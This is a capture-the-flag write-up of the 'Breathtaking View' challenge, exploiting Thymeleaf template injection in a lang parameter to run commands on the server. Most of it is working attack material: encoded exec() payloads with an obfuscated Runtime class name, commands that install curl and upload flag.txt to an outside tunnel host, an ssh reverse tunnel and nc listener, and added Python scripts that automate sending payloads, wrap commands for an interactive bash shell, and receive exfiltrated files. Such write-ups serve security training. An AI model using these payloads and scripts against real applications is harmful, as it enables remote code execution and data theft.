Breathtaking View
https://app.hackthebox.com/challenges/Breathtaking%2520View
Lang Parameter SSTI
After registering a user, the lang parameter (normally a locale such as fr or de, see the Referer) is used by the application as a Thymeleaf view name. A URL-encoded expression-preprocessing probe, __${7*7}__::.x, is sent in lang; if the preprocessing runs, the arithmetic result is used as the template name and shows up in the resulting error message.
GET /?lang=%5F%5F%24%7B7%2A7%7D%5F%5F%3A%3A%2Ex HTTP/1.1
Host: 83.136.254.158:47663
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.254.158:47663/?lang=fr
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=45E2BD7F8A86B36CAED250407C7B7A19
Connection: keep-alive
...
Error resolving template [49]
...
Swapping the arithmetic for a Java expression turns the injection into command execution. "".getClass().forName('j'+'av'+'a.lang.Runtime') assembles the class name from string fragments, so the literal java.lang.Runtime never appears in the request, and the *{...} selection expression is used instead of ${...}. Note that Runtime.exec(String) tokenizes its argument on whitespace and runs no shell, so pipes and redirects are not available and each payload has to be a single plain command. The exfiltration step needs curl on the target, so the first two payloads install it (this presupposes that the application user can run apt and reach the package mirrors, which was the case here):
__*{"".getClass().forName('j'+'av'+'a.lang.Runtime').getRuntime().exec("apt update")}__::.x
__*{"".getClass().forName('j'+'av'+'a.lang.Runtime').getRuntime().exec("apt install -y curl")}__::.x
Every payload has to be URL-encoded before it goes into the lang parameter; Burp Suite's Decoder (encode as URL, all characters) produces the form used here. The full request for the curl install looks like this:
GET /?lang=%5f%5f%2a%7b%22%22%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%27%2b%27%61%76%27%2b%27%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%61%70%74%20%69%6e%73%74%61%6c%6c%20%2d%79%20%63%75%72%6c%22%29%7d%5f%5f%3a%3a%2e%78 HTTP/1.1
Host: 83.136.254.158:47663
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.254.158:47663/?lang=fr
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=45E2BD7F8A86B36CAED250407C7B7A19
Connection: keep-alive
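The probe, the exec() payload and the encoding step above can be scripted instead of hand-built in Burp. The following is an added example and not code from the write-up; it assumes the host, port and JSESSIONID captured on the page (stale by now, replace them before calling send()) and it also shows two things the page only implies: how Runtime.exec(String) tokenizes a command, and how to wrap a command that needs shell features so it survives that tokenization.

```python
"""Build and URL-encode the Thymeleaf SSTI payloads used above, and read the responses.

Added example, not code from the write-up. Host, port and JSESSIONID are the values
captured on the page and are assumed to be stale; replace them before running send().
"""
from __future__ import annotations

import base64
import http.client
import re
import urllib.parse

TARGET_HOST = "83.136.254.158"        # from the captured requests (assumed stale)
TARGET_PORT = 47663
SESSION_COOKIE = "JSESSIONID=45E2BD7F8A86B36CAED250407C7B7A19"

PROBE = "__${7*7}__::.x"               # page's result: template name "49"


def thymeleaf_exec_payload(cmd: str) -> str:
    """Wrap cmd in the __*{...}__::.x preprocessing payload from the page.

    __...__ is evaluated during Thymeleaf expression preprocessing and the result becomes
    the template name; "::.x" keeps the view name a syntactically valid fragment expression.
    The class name is assembled from string fragments so "java.lang.Runtime" never appears
    literally in the request.
    """
    if '"' in cmd:
        raise ValueError("cmd is embedded in a Java double-quoted string literal")
    return ('__*{"".getClass().forName(\'j\'+\'av\'+\'a.lang.Runtime\')'
            f'.getRuntime().exec("{cmd}")}}__::.x')


def encode_all(s: str) -> str:
    """Percent-encode every byte with lowercase hex, the form Burp produced for the page's requests."""
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def decode(s: str) -> str:
    """Reverse of encode_all (and of ordinary URL encoding), for reading captured requests."""
    return urllib.parse.unquote(s)


def java_exec_argv(cmd: str) -> list[str]:
    """Mimic how Runtime.exec(String) splits its argument: a StringTokenizer on whitespace.

    No shell is involved, so quotes, pipes and redirects are passed on as literal tokens.
    That is why the page uses "curl URL -T flag.txt" rather than a redirect.
    """
    return cmd.split()


def bash_c_wrap(cmd: str) -> str:
    """Turn a shell command into something exec(String) can run as three tokens.

    Brace expansion stands in for the spaces that exec(String) would split on, and the
    real command travels base64-encoded so it contains no whitespace at all.
    """
    b64 = base64.b64encode(cmd.encode()).decode()
    return f"bash -c {{echo,{b64}}}|{{base64,-d}}|{{bash,-i}}"


def template_name_from_error(body: str) -> str | None:
    """Extract the evaluated template name from the Whitelabel 500 page.

    "49" for the probe; "java.lang.UNIXProcess@..." (Process.toString()) once exec() ran.
    """
    m = re.search(r"Error resolving template \[([^\]]*)\]", body)
    return m.group(1) if m else None


def send(lang_value: str) -> tuple[int, str | None]:
    """Deliver one payload in ?lang= using the registered user's session cookie."""
    conn = http.client.HTTPConnection(TARGET_HOST, TARGET_PORT, timeout=15)
    conn.request("GET", "/?lang=" + encode_all(lang_value),
                 headers={"Cookie": SESSION_COOKIE, "Accept-Language": "de-DE,de;q=0.9"})
    resp = conn.getresponse()
    body = resp.read().decode("utf-8", errors="replace")
    conn.close()
    return resp.status, template_name_from_error(body)


# Response body captured on the page, used to check template_name_from_error() offline.
SAMPLE_ERROR_BODY = ("<div>Error resolving template [java.lang.UNIXProcess@3672d41], template "
                     "might not exist or might not be accessible by any of the configured "
                     "Template Resolvers</div>")

if __name__ == "__main__":
    print(send(PROBE))                                   # page's result: (500, "49")
    for cmd in ("apt update", "apt install -y curl",
                "curl https://97691d4196b64b230baff59ed2f57493.serveo.net -T flag.txt"):
        print(send(thymeleaf_exec_payload(cmd)))         # page's result: a UNIXProcess@... name
```

encode_all() reproduces the page's Burp output byte for byte, so decode() applied to the captured lang values gives the plaintext payloads back. bash_c_wrap() is only needed when a command requires a pipe or a redirect; the page's commands do not, which is exactly why a plain curl upload was chosen.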
Exposing the local listener with serveo, an SSH reverse tunnel that gives local port 1234 a public HTTPS hostname the target can reach:
ssh -R 80:localhost:1234 serveo.net
Forwarding HTTP traffic from https://97691d4196b64b230baff59ed2f57493.serveo.net
Listener
nc -nlvp 1234
Request received by the listener once the curl payload runs. The target uploads flag.txt with a PUT; X-Forwarded-For carries the target's address because serveo proxies the connection, and the trailing % after the flag is the shell's marker for output without a newline (Content-Length is 21, the flag's exact length):
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43876
PUT /flag.txt HTTP/1.1
Host: 97691d4196b64b230baff59ed2f57493.serveo.net
User-Agent: curl/7.74.0
Content-Length: 21
Accept: */*
X-Forwarded-For: 83.136.254.158
X-Forwarded-Host: 97691d4196b64b230baff59ed2f57493.serveo.net
X-Forwarded-Proto: https
Accept-Encoding: gzip
HTB{whAt_4_v1ewWwww!}%
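A bare nc listener shows the upload but never answers, so curl on the target sits waiting. The following is an added example, not part of the write-up: a small HTTP receiver for the same port that parses the PUT, checks the body against Content-Length, stores it and replies 200. The sample request embedded in it is the one captured above, reassembled with CRLF line endings; the loot/ directory name is an assumption.

```python
"""Receiver for the curl -T upload triggered by the SSTI payload.

Added example, not code from the write-up. Listens on the same local port the
ssh -R tunnel forwards (1234); uploaded bodies are written to ./loot/ (assumed name).
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path


def parse_put(raw: bytes) -> dict:
    """Parse a raw HTTP/1.1 request (as nc displays it) into method, path, headers, body.

    The body is cut to Content-Length: curl -T sends the file bytes verbatim, so a flag
    stored without a trailing newline arrives as exactly that many bytes.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    return {"method": method, "path": path, "headers": headers, "body": body[:length]}


class ExfilHandler(BaseHTTPRequestHandler):
    """Store each PUT body under loot/<basename> and reply 200 so curl exits cleanly."""

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", "0"))
        data = self.rfile.read(length)
        name = Path(self.path).name or "unnamed"      # basename only: no path traversal into loot/
        loot = Path("loot")
        loot.mkdir(exist_ok=True)
        (loot / name).write_bytes(data)
        # serveo adds X-Forwarded-For, so this is the target's address, not the tunnel's
        src = self.headers.get("X-Forwarded-For", self.client_address[0])
        print(f"[+] {len(data)} bytes from {src} -> loot/{name}: {data!r}")
        self.send_response(200)
        self.end_headers()


def serve(port: int = 1234) -> None:
    """Run the receiver; pair it with: ssh -R 80:localhost:1234 serveo.net"""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()


# Request captured on the page (the nc output), reassembled with CRLF line endings.
CAPTURED_PUT = (
    b"PUT /flag.txt HTTP/1.1\r\n"
    b"Host: 97691d4196b64b230baff59ed2f57493.serveo.net\r\n"
    b"User-Agent: curl/7.74.0\r\n"
    b"Content-Length: 21\r\n"
    b"Accept: */*\r\n"
    b"X-Forwarded-For: 83.136.254.158\r\n"
    b"X-Forwarded-Host: 97691d4196b64b230baff59ed2f57493.serveo.net\r\n"
    b"X-Forwarded-Proto: https\r\n"
    b"Accept-Encoding: gzip\r\n"
    b"\r\n"
    b"HTB{whAt_4_v1ewWwww!}"
)

if __name__ == "__main__":
    print(parse_put(CAPTURED_PUT))
    serve()
```

parse_put() is the offline counterpart of the handler: running it over the captured request yields the 21-byte flag with no trailing newline, which is why the shell printed its % marker after it.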
Payload
__*{"".getClass().forName('j'+'av'+'a.lang.Runtime').getRuntime().exec("curl https://97691d4196b64b230baff59ed2f57493.serveo.net -T flag.txt")}__::.x
Payload URL-Encoded
%5f%5f%2a%7b%22%22%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%27%2b%27%61%76%27%2b%27%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%75%72%6c%20%68%74%74%70%73%3a%2f%2f%39%37%36%39%31%64%34%31%39%36%62%36%34%62%32%33%30%62%61%66%66%35%39%65%64%32%66%35%37%34%39%33%2e%73%65%72%76%65%6f%2e%6e%65%74%20%2d%54%20%66%6c%61%67%2e%74%78%74%22%29%7d%5f%5f%3a%3a%2e%78
Request
GET /?lang=%5f%5f%2a%7b%22%22%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%27%6a%27%2b%27%61%76%27%2b%27%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%27%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%75%72%6c%20%68%74%74%70%73%3a%2f%2f%39%37%36%39%31%64%34%31%39%36%62%36%34%62%32%33%30%62%61%66%66%35%39%65%64%32%66%35%37%34%39%33%2e%73%65%72%76%65%6f%2e%6e%65%74%20%2d%54%20%66%6c%61%67%2e%74%78%74%22%29%7d%5f%5f%3a%3a%2e%78 HTTP/1.1
Host: 83.136.254.158:47663
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.254.158:47663/?lang=fr
Accept-Encoding: gzip, deflate, br
Cookie: JSESSIONID=45E2BD7F8A86B36CAED250407C7B7A19
Connection: keep-alive
Response. The 500 is expected: the template name in the error is the toString() of the java.lang.UNIXProcess object that exec() returned, which confirms the command was launched even though the request itself fails. curl runs in the background and uploads the flag to the tunnel.
HTTP/1.1 500
Content-Type: text/html;charset=UTF-8
Content-Language: de-DE
Content-Length: 451
Date: Fri, 11 Oct 2024 21:18:45 GMT
Connection: close
<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p><div id='created'>Fri Oct 11 21:18:45 UTC 2024</div><div>There was an unexpected error (type=Internal Server Error, status=500).</div><div>Error resolving template [java.lang.UNIXProcess@3672d41], template might not exist or might not be accessible by any of the configured Template Resolvers</div></body></html>